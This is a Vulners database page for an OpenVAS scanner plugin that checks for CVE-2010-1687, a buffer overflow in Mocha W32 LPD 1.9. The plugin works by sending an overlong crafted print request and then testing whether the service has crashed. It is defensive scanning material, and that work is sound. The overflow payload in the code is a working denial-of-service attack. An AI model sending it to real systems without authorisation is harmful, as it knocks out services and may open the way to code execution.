Lucene search
+L

Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability

🗓️ 19 Apr 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 50 Views

Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability with denial of service impac

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-1687
14 Apr 201000:00
circl
CVE
CVE-2010-1687
4 May 201015:00
cve
Cvelist
CVE-2010-1687
4 May 201015:00
cvelist
EUVD
EUVD-2010-1707
7 Oct 202500:30
euvd
NVD
CVE-2010-1687
4 May 201016:00
nvd
Prion
Stack overflow
4 May 201016:00
prion
RedhatCVE
CVE-2010-1687
22 May 202501:40
redhatcve
SourceLink
securityfocuswww.securityfocus.com/bid/39498
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100580");
  script_version("2025-01-21T05:37:33+0000");
  script_tag(name:"last_modification", value:"2025-01-21 05:37:33 +0000 (Tue, 21 Jan 2025)");
  script_tag(name:"creation_date", value:"2010-04-19 20:46:01 +0200 (Mon, 19 Apr 2010)");
  script_cve_id("CVE-2010-1687");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_name("Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability");
  script_category(ACT_DENIAL);
  script_family("Denial of Service");
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_dependencies("find_service.nasl", "find_service1.nasl", "find_service2.nasl");
  script_require_ports("Services/lpd", 515);

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/39498");

  script_tag(name:"summary", value:"Mocha W32 LPD is prone to a remote buffer-overflow vulnerability
  because the software fails to perform adequate boundary checks on user-supplied data.");

  script_tag(name:"vuldetect", value:"Sends a crafted LPD request and checks if the service is still
  responding.");

  script_tag(name:"impact", value:"Successful exploits may allow attackers to execute arbitrary code
  with the privileges of the user running the affected application. Failed exploit attempts will
  result in a denial-of-service condition.");

  script_tag(name:"affected", value:"This issue affects W32 LPD 1.9. Other versions may be
  vulnerable as well.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

include("misc_func.inc");
include("port_service_func.inc");

function check_lpd(port) {

  soc = open_priv_sock_tcp(dport:port);
  if(!soc) return FALSE;

  data = string("vt-test", rand());
  req = raw_string(0x04) + data + " " + raw_string(0x0a);
  send(socket:soc, data:req);
  res = recv(socket:soc, length:1024);
  close(soc);

  if(!res || "printer" >!< tolower(res))
    return FALSE;
  else
    return TRUE;
}

port = service_get_port(default:515, proto:"lpd");

if(!check_lpd(port:port))
  exit(0);

exploit  = raw_string("\x05\x64\x65\x66\x61\x75\x6c\x74\x20");
exploit += crap(data:raw_string("\x41"), length:1500);
exploit += raw_string("\x20\x61\x6c\x6c\x0a");

for(i = 0; i < 5; i++) {
  soc = open_sock_tcp(port);
  if(!soc)break;
  send(socket:soc, data:raw_string("\x02"));
  send(socket:soc, data:exploit);
  close(soc);
  sleep(1);
}

if(!check_lpd(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jan 2025 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 25
EPSS0.05145
50